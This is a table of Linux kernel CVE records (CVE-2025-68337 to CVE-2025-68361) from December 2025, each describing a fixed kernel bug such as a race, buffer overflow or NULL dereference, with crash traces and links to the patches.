| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted There's issue when file system corrupted: ------------[ cut here ]------------ kernel BUG at fs/jbd2/transaction.c:1289! Oops: invalid opcode: 0000 [#1] SMP KASAN PTI CPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next RIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0 RSP: 0018:ffff888117aafa30 EFLAGS: 00010202 RAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534 RDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010 RBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028 R10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000 R13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0 Call Trace: <TASK> __ext4_journal_get_create_access+0x42/0x170 ext4_getblk+0x319/0x6f0 ext4_bread+0x11/0x100 ext4_append+0x1e6/0x4a0 ext4_init_new_dir+0x145/0x1d0 ext4_mkdir+0x326/0x920 vfs_mkdir+0x45c/0x740 do_mkdirat+0x234/0x2f0 __x64_sys_mkdir+0xd6/0x120 do_syscall_64+0x5f/0xfa0 entry_SYSCALL_64_after_hwframe+0x76/0x7e The above issue occurs with us in errors=continue mode when accompanied by storage failures. There have been many inconsistencies in the file system data. In the case of file system data inconsistency, for example, if the block bitmap of a referenced block is not set, it can lead to the situation where a block being committed is allocated and used again. As a result, the following condition will not be satisfied then trigger BUG_ON. Of course, it is entirely possible to construct a problematic image that can trigger this BUG_ON through specific operations. In fact, I have constructed such an image and easily reproduced this issue. Therefore, J_ASSERT() holds true only under ideal conditions, but it may not necessarily be satisfied in exceptional scenarios. Using J_ASSERT() directly in abnormal situations would cause the system to crash, which is clearly not what we want. So here we directly trigger a JBD abort instead of immediately invoking BUG_ON. | 2025-12-22 | not yet calculated | CVE-2025-68337 | https://git.kernel.org/stable/c/a2a7f854d154a3e9232fec80782dad951655f52f https://git.kernel.org/stable/c/bf34c72337e40c4670cceeb79b353356933a254b https://git.kernel.org/stable/c/aa1703f3f706ea0867fb1991dcac709c9ec94cfb https://git.kernel.org/stable/c/986835bf4d11032bba4ab8414d18fce038c61bb4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: microchip: Don't free uninitialized ksz_irq If something goes wrong at setup, ksz_irq_free() can be called on uninitialized ksz_irq (for example when ksz_ptp_irq_setup() fails). It leads to freeing uninitialized IRQ numbers and/or domains. Use dsa_switch_for_each_user_port_continue_reverse() in the error path to iterate only over the fully initialized ports. | 2025-12-23 | not yet calculated | CVE-2025-68338 | https://git.kernel.org/stable/c/9428654c827fa8d38b898135d26d39ee2d544246 https://git.kernel.org/stable/c/32abbcf4379a0f851d7eb9d4389e7bf5c64bf6c0 https://git.kernel.org/stable/c/25b62cc5b22c45face094ae3e8717258e46d1d19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: atm/fore200e: Fix possible data race in fore200e_open() Protect access to fore200e->available_cell_rate with rate_mtx lock in the error handling path of fore200e_open() to prevent a data race. The field fore200e->available_cell_rate is a shared resource used to track available bandwidth. It is concurrently accessed by fore200e_open(), fore200e_close(), and fore200e_change_qos(). In fore200e_open(), the lock rate_mtx is correctly held when subtracting vcc->qos.txtp.max_pcr from available_cell_rate to reserve bandwidth. However, if the subsequent call to fore200e_activate_vcin() fails, the function restores the reserved bandwidth by adding back to available_cell_rate without holding the lock. This introduces a race condition because available_cell_rate is a global device resource shared across all VCCs. If the error path in fore200e_open() executes concurrently with operations like fore200e_close() or fore200e_change_qos() on other VCCs, a read-modify-write race occurs. Specifically, the error path reads the rate without the lock. If another CPU acquires the lock and modifies the rate (e.g., releasing bandwidth in fore200e_close()) between this read and the subsequent write, the error path will overwrite the concurrent update with a stale value. This results in incorrect bandwidth accounting. | 2025-12-23 | not yet calculated | CVE-2025-68339 | https://git.kernel.org/stable/c/1b60f42a639999c37da7f1fbfa1ad29cf4cbdd2d https://git.kernel.org/stable/c/bd1415efbab507b9b995918105eef953013449dd https://git.kernel.org/stable/c/ed34c70d88e2b8b9bc6c3ede88751186d6c6d5d1 https://git.kernel.org/stable/c/9917ba597cf95f307778e495f71ff25a5064d167 https://git.kernel.org/stable/c/667ac868823224374f819500adc5baa2889c7bc5 https://git.kernel.org/stable/c/6610361458e7eb6502dd3182f586f91fcc218039 https://git.kernel.org/stable/c/82fca3d8a4a34667f01ec2351a607135249c9cff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: team: Move team device type change at the end of team_port_add Attempting to add a port device that is already up will expectedly fail, but not before modifying the team device header_ops. In the case of the syzbot reproducer the gre0 device is already in state UP when it attempts to add it as a port device of team0, this fails but before that header_ops->create of team0 is changed from eth_header to ipgre_header in the call to team_dev_type_check_change. Later when we end up in ipgre_header() struct ip_tunnel* points to nonsense as the private data of the device still holds a struct team. Example sequence of iproute2 commands to reproduce the hang/BUG(): ip link add dev team0 type team ip link add dev gre0 type gre ip link set dev gre0 up ip link set dev gre0 master team0 ip link set dev team0 up ping -I team0 1.1.1.1 Move team_dev_type_check_change down where all other checks have passed as it changes the dev type with no way to restore it in case one of the checks that follow it fail. Also make sure to preserve the origial mtu assignment: - If port_dev is not the same type as dev, dev takes mtu from port_dev - If port_dev is the same type as dev, port_dev takes mtu from dev This is done by adding a conditional before the call to dev_set_mtu to prevent it from assigning port_dev->mtu = dev->mtu and instead letting team_dev_type_check_change assign dev->mtu = port_dev->mtu. The conditional is needed because the patch moves the call to team_dev_type_check_change past dev_set_mtu. Testing: - team device driver in-tree selftests - Add/remove various devices as slaves of team device - syzbot | 2025-12-23 | not yet calculated | CVE-2025-68340 | https://git.kernel.org/stable/c/4040b5e8963982a00aa821300cb746efc9f2947e https://git.kernel.org/stable/c/e3eed4f038214494af62c7d2d64749e5108ce6ca https://git.kernel.org/stable/c/0ae9cfc454ea5ead5f3ddbdfe2e70270d8e2c8ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: veth: reduce XDP no_direct return section to fix race As explain in commit fa349e396e48 ("veth: Fix race with AF_XDP exposing old or uninitialized descriptors") for veth there is a chance after napi_complete_done() that another CPU can manage start another NAPI instance running veth_pool(). For NAPI this is correctly handled as the napi_schedule_prep() check will prevent multiple instances from getting scheduled, but for the remaining code in veth_pool() this can run concurrent with the newly started NAPI instance. The problem/race is that xdp_clear_return_frame_no_direct() isn't designed to be nested. Prior to commit 401cb7dae813 ("net: Reference bpf_redirect_info via task_struct on PREEMPT_RT.") the temporary BPF net context bpf_redirect_info was stored per CPU, where this wasn't an issue. Since this commit the BPF context is stored in 'current' task_struct. When running veth in threaded-NAPI mode, then the kthread becomes the storage area. Now a race exists between two concurrent veth_pool() function calls one exiting NAPI and one running new NAPI, both using the same BPF net context. Race is when another CPU gets within the xdp_set_return_frame_no_direct() section before exiting veth_pool() calls the clear-function xdp_clear_return_frame_no_direct(). | 2025-12-23 | not yet calculated | CVE-2025-68341 | https://git.kernel.org/stable/c/c1ceabcb347d1b0f7e70a7384ec7eff3847b7628 https://git.kernel.org/stable/c/d0bd018ad72a8a598ae709588934135017f8af52 https://git.kernel.org/stable/c/a14602fcae17a3f1cb8a8521bedf31728f9e7e39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: gs_usb: gs_usb_receive_bulk_callback(): check actual_length before accessing data The URB received in gs_usb_receive_bulk_callback() contains a struct gs_host_frame. The length of the data after the header depends on the gs_host_frame hf::flags and the active device features (e.g. time stamping). Introduce a new function gs_usb_get_minimum_length() and check that we have at least received the required amount of data before accessing it. Only copy the data to that skb that has actually been received. [mkl: rename gs_usb_get_minimum_length() -> +gs_usb_get_minimum_rx_length()] | 2025-12-23 | not yet calculated | CVE-2025-68342 | https://git.kernel.org/stable/c/4ffac725154cf6a253f5e6aa0c8946232b6a0af5 https://git.kernel.org/stable/c/ad55004a3cb5b41ef78aa6c09e7bc5a489ba652b https://git.kernel.org/stable/c/fb0c7c77a7ae3a2c3404b7d0173b8739a754b513 https://git.kernel.org/stable/c/395d988f93861101ec89d0dd9e3b876ae9392a5b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: gs_usb: gs_usb_receive_bulk_callback(): check actual_length before accessing header The driver expects to receive a struct gs_host_frame in gs_usb_receive_bulk_callback(). Use struct_group to describe the header of the struct gs_host_frame and check that we have at least received the header before accessing any members of it. To resubmit the URB, do not dereference the pointer chain "dev->parent->hf_size_rx" but use "parent->hf_size_rx" instead. Since "urb->context" contains "parent", it is always defined, while "dev" is not defined if the URB it too short. | 2025-12-23 | not yet calculated | CVE-2025-68343 | https://git.kernel.org/stable/c/18cbce43363c9f84b90a92d57df341155eee0697 https://git.kernel.org/stable/c/3433680b759646efcacc64fe36aa2e51ae34b8f0 https://git.kernel.org/stable/c/616eee3e895b8ca0028163fcb1dce5e3e9dea322 https://git.kernel.org/stable/c/f31693dc3a584c0ad3937e857b59dbc1a7ed2b87 https://git.kernel.org/stable/c/6fe9f3279f7d2518439a7962c5870c6e9ecbadcf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: wavefront: Fix integer overflow in sample size validation The wavefront_send_sample() function has an integer overflow issue when validating sample size. The header->size field is u32 but gets cast to int for comparison with dev->freemem Fix by using unsigned comparison to avoid integer overflow. | 2025-12-24 | not yet calculated | CVE-2025-68344 | https://git.kernel.org/stable/c/5588b7c86effffa9bb55383a38800649d7b40778 https://git.kernel.org/stable/c/bca11de0a277b8baeb7d006f93b543c907b6e782 https://git.kernel.org/stable/c/1823e08f76c68b9e1d26f6d5ef831b96f61a62a0 https://git.kernel.org/stable/c/0c4a13ba88594fd4a27292853e736c6b4349823d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: hda: cs35l41: Fix NULL pointer dereference in cs35l41_hda_read_acpi() The acpi_get_first_physical_node() function can return NULL, in which case the get_device() function also returns NULL, but this value is then dereferenced without checking,so add a check to prevent a crash. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2025-12-24 | not yet calculated | CVE-2025-68345 | https://git.kernel.org/stable/c/c28946b7409b7b68fb0481ec738c8b04578b11c6 https://git.kernel.org/stable/c/343fa9800cf9870ec681e21f0a6f2157b74ae520 https://git.kernel.org/stable/c/c34b04cc6178f33c08331568c7fd25c5b9a39f66 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: dice: fix buffer overflow in detect_stream_formats() The function detect_stream_formats() reads the stream_count value directly from a FireWire device without validating it. This can lead to out-of-bounds writes when a malicious device provides a stream_count value greater than MAX_STREAMS. Fix by applying the same validation to both TX and RX stream counts in detect_stream_formats(). | 2025-12-24 | not yet calculated | CVE-2025-68346 | https://git.kernel.org/stable/c/c0a1fe1902ad23e6d48e0f68be1258ccf7a163e6 https://git.kernel.org/stable/c/932aa1e80b022419cf9710e970739b7a8794f27c https://git.kernel.org/stable/c/1e1b3207a53e50d5a66289fffc1f7d52cd9c50f9 https://git.kernel.org/stable/c/324f3e03e8a85931ce0880654e3c3eb38b0f0bba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: firewire-motu: fix buffer overflow in hwdep read for DSP events The DSP event handling code in hwdep_read() could write more bytes to the user buffer than requested, when a user provides a buffer smaller than the event header size (8 bytes). Fix by using min_t() to clamp the copy size, This ensures we never copy more than the user requested. | 2025-12-24 | not yet calculated | CVE-2025-68347 | https://git.kernel.org/stable/c/6275fd726d53a8ec724f20201cf3bd862711e17b https://git.kernel.org/stable/c/161291bac551821bba98eb4ea84c82338578d1b0 https://git.kernel.org/stable/c/cdda0d06f8650e33255f79839f188bbece44117c https://git.kernel.org/stable/c/210d77cca3d0494ed30a5c628b20c1d95fa04fb1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: fix memory leak in __blkdev_issue_zero_pages Move the fatal signal check before bio_alloc() to prevent a memory leak when BLKDEV_ZERO_KILLABLE is set and a fatal signal is pending. Previously, the bio was allocated before checking for a fatal signal. If a signal was pending, the code would break out of the loop without freeing or chaining the just-allocated bio, causing a memory leak. This matches the pattern already used in __blkdev_issue_write_zeroes() where the signal check precedes the allocation. | 2025-12-24 | not yet calculated | CVE-2025-68348 | https://git.kernel.org/stable/c/453e4b0c84d0db1454ff0adf655d91179e6fca3a https://git.kernel.org/stable/c/7957635c679e8a01147163a3a4a1f16e1210fa03 https://git.kernel.org/stable/c/7193407bc4457212fa38ec3aff9c640e63a8dbef https://git.kernel.org/stable/c/f7e3f852a42d7cd8f1af2c330d9d153e30c8adcf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid Fixes a crash when layout is null during this call stack: write_inode -> nfs4_write_inode -> pnfs_layoutcommit_inode pnfs_set_layoutcommit relies on the lseg refcount to keep the layout around. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt to reference a null layout. | 2025-12-24 | not yet calculated | CVE-2025-68349 | https://git.kernel.org/stable/c/59947dff0fb7c19c09ce6dccbcd253fd542b6c25 https://git.kernel.org/stable/c/ca2e7fdad7c683b64821c94a58b9b68733214dad https://git.kernel.org/stable/c/38694f9aae00459ab443a7dc8b3949a6b33b560a https://git.kernel.org/stable/c/e0f8058f2cb56de0b7572f51cd563ca5debce746 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exfat: fix divide-by-zero in exfat_allocate_bitmap The variable max_ra_count can be 0 in exfat_allocate_bitmap(), which causes a divide-by-zero error in the subsequent modulo operation (i % max_ra_count), leading to a system crash. When max_ra_count is 0, it means that readahead is not used. This patch load the bitmap without readahead. | 2025-12-24 | not yet calculated | CVE-2025-68350 | https://git.kernel.org/stable/c/88fc3dd6e631b3e2975f898c6c2b6bc6f7058b44 https://git.kernel.org/stable/c/d70a5804c563b5e34825353ba9927509df709651 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exfat: fix refcount leak in exfat_find Fix refcount leaks in `exfat_find` related to `exfat_get_dentry_set`. Function `exfat_get_dentry_set` would increase the reference counter of `es->bh` on success. Therefore, `exfat_put_dentry_set` must be called after `exfat_get_dentry_set` to ensure refcount consistency. This patch relocate two checks to avoid possible leaks. | 2025-12-24 | not yet calculated | CVE-2025-68351 | https://git.kernel.org/stable/c/d009ff8959d28d2a33aeb96a5f7e7161c421d78f https://git.kernel.org/stable/c/9aee8de970f18c2aaaa348e3de86c38e2d956c1d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: ch341: fix out-of-bounds memory access in ch341_transfer_one Discovered by Atuin - Automated Vulnerability Discovery Engine. The 'len' variable is calculated as 'min(32, trans->len + 1)', which includes the 1-byte command header. When copying data from 'trans->tx_buf' to 'ch341->tx_buf + 1', using 'len' as the length is incorrect because: 1. It causes an out-of-bounds read from 'trans->tx_buf' (which has size 'trans->len', i.e., 'len - 1' in this context). 2. It can cause an out-of-bounds write to 'ch341->tx_buf' if 'len' is CH341_PACKET_LENGTH (32). Writing 32 bytes to ch341->tx_buf + 1 overflows the buffer. Fix this by copying 'len - 1' bytes. | 2025-12-24 | not yet calculated | CVE-2025-68352 | https://git.kernel.org/stable/c/cad6c0fd6f3c0e76a1f75df4bce3b08a13f08974 https://git.kernel.org/stable/c/ea1e43966cd03098fcd5f0d72e6c2901d45fa08d https://git.kernel.org/stable/c/81841da1f30f66a850cc8796d99ba330aad9d696 https://git.kernel.org/stable/c/545d1287e40a55242f6ab68bcc1ba3b74088b1bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: vxlan: prevent NULL deref in vxlan_xmit_one Neither sock4 nor sock6 pointers are guaranteed to be non-NULL in vxlan_xmit_one, e.g. if the iface is brought down. This can lead to the following NULL dereference: BUG: kernel NULL pointer dereference, address: 0000000000000010 Oops: Oops: 0000 [#1] SMP NOPTI RIP: 0010:vxlan_xmit_one+0xbb3/0x1580 Call Trace: vxlan_xmit+0x429/0x610 dev_hard_start_xmit+0x55/0xa0 __dev_queue_xmit+0x6d0/0x7f0 ip_finish_output2+0x24b/0x590 ip_output+0x63/0x110 Mentioned commits changed the code path in vxlan_xmit_one and as a side effect the sock4/6 pointer validity checks in vxlan(6)_get_route were lost. Fix this by adding back checks. Since both commits being fixed were released in the same version (v6.7) and are strongly related, bundle the fixes in a single commit. | 2025-12-24 | not yet calculated | CVE-2025-68353 | https://git.kernel.org/stable/c/4ac26aafdc8c7271414e2e7c0b2cb266a26591bc https://git.kernel.org/stable/c/1f73a56f986005f0bc64ed23873930e2ee4f5911 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: core: Protect regulator_supply_alias_list with regulator_list_mutex regulator_supply_alias_list was accessed without any locking in regulator_supply_alias(), regulator_register_supply_alias(), and regulator_unregister_supply_alias(). Concurrent registration, unregistration and lookups can race, leading to: 1 use-after-free if an alias entry is removed while being read, 2 duplicate entries when two threads register the same alias, 3 inconsistent alias mappings observed by consumers. Protect all traversals, insertions and deletions on regulator_supply_alias_list with the existing regulator_list_mutex. | 2025-12-24 | not yet calculated | CVE-2025-68354 | https://git.kernel.org/stable/c/a9864d42ebcdd394ebb864643b961b36e7b515be https://git.kernel.org/stable/c/431a1d44ad4866362cc28fc1cc4ca93d84989239 https://git.kernel.org/stable/c/64099b5c0aeb70bc7cd5556eb7f59c5b4a5010bf https://git.kernel.org/stable/c/0cc15a10c3b4ab14cd71b779fd5c9ca0cb2bc30d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix exclusive map memory leak When excl_prog_hash is 0 and excl_prog_hash_size is non-zero, the map also needs to be freed. Otherwise, the map memory will not be reclaimed, just like the memory leak problem reported by syzbot [1]. syzbot reported: BUG: memory leak backtrace (crc 7b9fb9b4): map_create+0x322/0x11e0 kernel/bpf/syscall.c:1512 __sys_bpf+0x3556/0x3610 kernel/bpf/syscall.c:6131 | 2025-12-24 | not yet calculated | CVE-2025-68355 | https://git.kernel.org/stable/c/f0022551745d72fc0e7bc8601234d690dee2178d https://git.kernel.org/stable/c/688b745401ab16e2e1a3b504863f0a45fd345638 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: Prevent recursive memory reclaim Function new_inode() returns a new inode with inode->i_mapping->gfp_mask set to GFP_HIGHUSER_MOVABLE. This value includes the __GFP_FS flag, so allocations in that address space can recurse into filesystem memory reclaim. We don't want that to happen because it can consume a significant amount of stack memory. Worse than that is that it can also deadlock: for example, in several places, gfs2_unstuff_dinode() is called inside filesystem transactions. This calls filemap_grab_folio(), which can allocate a new folio, which can trigger memory reclaim. If memory reclaim recurses into the filesystem and starts another transaction, a deadlock will ensue. To fix these kinds of problems, prevent memory reclaim from recursing into filesystem code by making sure that the gfp_mask of inode address spaces doesn't include __GFP_FS. The "meta" and resource group address spaces were already using GFP_NOFS as their gfp_mask (which doesn't include __GFP_FS). The default value of GFP_HIGHUSER_MOVABLE is less restrictive than GFP_NOFS, though. To avoid being overly limiting, use the default value and only knock off the __GFP_FS flag. I'm not sure if this will actually make a difference, but it also shouldn't hurt. This patch is loosely based on commit ad22c7a043c2 ("xfs: prevent stack overflows from page cache allocation"). Fixes xfstest generic/273. | 2025-12-24 | not yet calculated | CVE-2025-68356 | https://git.kernel.org/stable/c/edb2b255618621dc83d0ec23150e16b2c697077f https://git.kernel.org/stable/c/9c0960ed112398bdb6c60ccf6e6b583bc59acede https://git.kernel.org/stable/c/49e7347f4644d031306d56cb4d51e467cbdcbc69 https://git.kernel.org/stable/c/2c5f4a53476e3cab70adc77b38942c066bd2c17c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iomap: allocate s_dio_done_wq for async reads as well Since commit 222f2c7c6d14 ("iomap: always run error completions in user context"), read error completions are deferred to s_dio_done_wq. This means the workqueue also needs to be allocated for async reads. | 2025-12-24 | not yet calculated | CVE-2025-68357 | https://git.kernel.org/stable/c/c67775cf0da2407f113c1229e350758f4dca0f51 https://git.kernel.org/stable/c/7fd8720dff2d9c70cf5a1a13b7513af01952ec02 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix racy bitfield write in btrfs_clear_space_info_full() From the memory-barriers.txt document regarding memory barrier ordering guarantees: (*) These guarantees do not apply to bitfields, because compilers often generate code to modify these using non-atomic read-modify-write sequences. Do not attempt to use bitfields to synchronize parallel algorithms. (*) Even in cases where bitfields are protected by locks, all fields in a given bitfield must be protected by one lock. If two fields in a given bitfield are protected by different locks, the compiler's non-atomic read-modify-write sequences can cause an update to one field to corrupt the value of an adjacent field. btrfs_space_info has a bitfield sharing an underlying word consisting of the fields full, chunk_alloc, and flush: struct btrfs_space_info { struct btrfs_fs_info * fs_info; /* 0 8 */ struct btrfs_space_info * parent; /* 8 8 */ ... int clamp; /* 172 4 */ unsigned int full:1; /* 176: 0 4 */ unsigned int chunk_alloc:1; /* 176: 1 4 */ unsigned int flush:1; /* 176: 2 4 */ ... Therefore, to be safe from parallel read-modify-writes losing a write to one of the bitfield members protected by a lock, all writes to all the bitfields must use the lock. They almost universally do, except for btrfs_clear_space_info_full() which iterates over the space_infos and writes out found->full = 0 without a lock. Imagine that we have one thread completing a transaction in which we finished deleting a block_group and are thus calling btrfs_clear_space_info_full() while simultaneously the data reclaim ticket infrastructure is running do_async_reclaim_data_space(): T1 T2 btrfs_commit_transaction btrfs_clear_space_info_full data_sinfo->full = 0 READ: full:0, chunk_alloc:0, flush:1 do_async_reclaim_data_space(data_sinfo) spin_lock(&space_info->lock); if(list_empty(tickets)) space_info->flush = 0; READ: full: 0, chunk_alloc:0, flush:1 MOD/WRITE: full: 0, chunk_alloc:0, flush:0 spin_unlock(&space_info->lock); return; MOD/WRITE: full:0, chunk_alloc:0, flush:1 and now data_sinfo->flush is 1 but the reclaim worker has exited. This breaks the invariant that flush is 0 iff there is no work queued or running. Once this invariant is violated, future allocations that go into __reserve_bytes() will add tickets to space_info->tickets but will see space_info->flush is set to 1 and not queue the work. After this, they will block forever on the resulting ticket, as it is now impossible to kick the worker again. I also confirmed by looking at the assembly of the affected kernel that it is doing RMW operations. For example, to set the flush (3rd) bit to 0, the assembly is: andb $0xfb,0x60(%rbx) and similarly for setting the full (1st) bit to 0: andb $0xfe,-0x20(%rax) So I think this is really a bug on practical systems. I have observed a number of systems in this exact state, but am currently unable to reproduce it. Rather than leaving this footgun lying around for the future, take advantage of the fact that there is room in the struct anyway, and that it is already quite large and simply change the three bitfield members to bools. This avoids writes to space_info->full having any effect on ---truncated--- | 2025-12-24 | not yet calculated | CVE-2025-68358 | https://git.kernel.org/stable/c/6f442808a86eef847ee10afa9e6459494ed85bb3 https://git.kernel.org/stable/c/742b90eaf394f0018352c0e10dc89763b2dd5267 https://git.kernel.org/stable/c/38e818718c5e04961eea0fa8feff3f100ce40408 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix double free of qgroup record after failure to add delayed ref head In the previous code it was possible to incur into a double kfree() scenario when calling add_delayed_ref_head(). This could happen if the record was reported to already exist in the btrfs_qgroup_trace_extent_nolock() call, but then there was an error later on add_delayed_ref_head(). In this case, since add_delayed_ref_head() returned an error, the caller went to free the record. Since add_delayed_ref_head() couldn't set this kfree'd pointer to NULL, then kfree() would have acted on a non-NULL 'record' object which was pointing to memory already freed by the callee. The problem comes from the fact that the responsibility to kfree the object is on both the caller and the callee at the same time. Hence, the fix for this is to shift the ownership of the 'qrecord' object out of the add_delayed_ref_head(). That is, we will never attempt to kfree() the given object inside of this function, and will expect the caller to act on the 'qrecord' object on its own. The only exception where the 'qrecord' object cannot be kfree'd is if it was inserted into the tracing logic, for which we already have the 'qrecord_inserted_ret' boolean to account for this. Hence, the caller has to kfree the object only if add_delayed_ref_head() reports not to have inserted it on the tracing logic. As a side-effect of the above, we must guarantee that 'qrecord_inserted_ret' is properly initialized at the start of the function, not at the end, and then set when an actual insert happens. This way we avoid 'qrecord_inserted_ret' having an invalid value on an early exit. The documentation from the add_delayed_ref_head() has also been updated to reflect on the exact ownership of the 'qrecord' object. | 2025-12-24 | not yet calculated | CVE-2025-68359 | https://git.kernel.org/stable/c/7617680769e3119dfb3b43a2b7c287ce2242211c https://git.kernel.org/stable/c/364685c4c2d9c9f4408d95451bcf42fdeebc3ebb https://git.kernel.org/stable/c/725e46298876a2cc1f1c3fb22ba69d29102c3ddf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks MT7996 driver can use both wed and wed_hif2 devices to offload traffic from/to the wireless NIC. In the current codebase we assume to always use the primary wed device in wed callbacks resulting in the following crash if the hw runs wed_hif2 (e.g. 6GHz link). [ 297.455876] Unable to handle kernel read from unreadable memory at virtual address 000000000000080a [ 297.464928] Mem abort info: [ 297.467722] ESR = 0x0000000096000005 [ 297.471461] EC = 0x25: DABT (current EL), IL = 32 bits [ 297.476766] SET = 0, FnV = 0 [ 297.479809] EA = 0, S1PTW = 0 [ 297.482940] FSC = 0x05: level 1 translation fault [ 297.487809] Data abort info: [ 297.490679] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000 [ 297.496156] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 297.501196] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 297.506500] user pgtable: 4k pages, 39-bit VAs, pgdp=0000000107480000 [ 297.512927] [000000000000080a] pgd=08000001097fb003, p4d=08000001097fb003, pud=08000001097fb003, pmd=0000000000000000 [ 297.523532] Internal error: Oops: 0000000096000005 [#1] SMP [ 297.715393] CPU: 2 UID: 0 PID: 45 Comm: kworker/u16:2 Tainted: G O 6.12.50 #0 [ 297.723908] Tainted: [O]=OOT_MODULE [ 297.727384] Hardware name: Banana Pi BPI-R4 (2x SFP+) (DT) [ 297.732857] Workqueue: nf_ft_offload_del nf_flow_rule_route_ipv6 [nf_flow_table] [ 297.740254] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 297.747205] pc : mt76_wed_offload_disable+0x64/0xa0 [mt76] [ 297.752688] lr : mtk_wed_flow_remove+0x58/0x80 [ 297.757126] sp : ffffffc080fe3ae0 [ 297.760430] x29: ffffffc080fe3ae0 x28: ffffffc080fe3be0 x27: 00000000deadbef7 [ 297.767557] x26: ffffff80c5ebca00 x25: 0000000000000001 x24: ffffff80c85f4c00 [ 297.774683] x23: ffffff80c1875b78 x22: ffffffc080d42cd0 x21: ffffffc080660018 [ 297.781809] x20: ffffff80c6a076d0 x19: ffffff80c6a043c8 x18: 0000000000000000 [ 297.788935] x17: 0000000000000000 x16: 0000000000000001 x15: 0000000000000000 [ 297.796060] x14: 0000000000000019 x13: ffffff80c0ad8ec0 x12: 00000000fa83b2da [ 297.803185] x11: ffffff80c02700c0 x10: ffffff80c0ad8ec0 x9 : ffffff81fef96200 [ 297.810311] x8 : ffffff80c02700c0 x7 : ffffff80c02700d0 x6 : 0000000000000002 [ 297.817435] x5 : 0000000000000400 x4 : 0000000000000000 x3 : 0000000000000000 [ 297.824561] x2 : 0000000000000001 x1 : 0000000000000800 x0 : ffffff80c6a063c8 [ 297.831686] Call trace: [ 297.834123] mt76_wed_offload_disable+0x64/0xa0 [mt76] [ 297.839254] mtk_wed_flow_remove+0x58/0x80 [ 297.843342] mtk_flow_offload_cmd+0x434/0x574 [ 297.847689] mtk_wed_setup_tc_block_cb+0x30/0x40 [ 297.852295] nf_flow_offload_ipv6_hook+0x7f4/0x964 [nf_flow_table] [ 297.858466] nf_flow_rule_route_ipv6+0x438/0x4a4 [nf_flow_table] [ 297.864463] process_one_work+0x174/0x300 [ 297.868465] worker_thread+0x278/0x430 [ 297.872204] kthread+0xd8/0xdc [ 297.875251] ret_from_fork+0x10/0x20 [ 297.878820] Code: 928b5ae0 8b000273 91400a60 f943fa61 (79401421) [ 297.884901] ---[ end trace 0000000000000000 ]--- Fix the issue detecting the proper wed reference to use running wed callabacks. | 2025-12-24 | not yet calculated | CVE-2025-68360 | https://git.kernel.org/stable/c/ab94ecb997fd1bbc501a0116c7aad51556b67c86 https://git.kernel.org/stable/c/d582d0e988d696698c94edf097062bb987ae592c https://git.kernel.org/stable/c/385aab8fccd7a8746b9f1a17f3c1e38498a14bc7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: limit the level of fs stacking for file-backed mounts Otherwise, it could cause potential kernel stack overflow (e.g., EROFS mounting itself). | 2025-12-24 | not yet calculated | CVE-2025-68361 | https://git.kernel.org/stable/c/34447aeedbaea8f9aad3da5b07030a1c0e124639 https://git.kernel.org/stable/c/b4911825348a494e894e6ccfcf88d99e9425f129 https://git.kernel.org/stable/c/620472e6b303c4dbcc7ecf1aba1cda4f3523e4a4 https://git.kernel.org/stable/c/d53cd891f0e4311889349fff3a784dc552f814b9 |
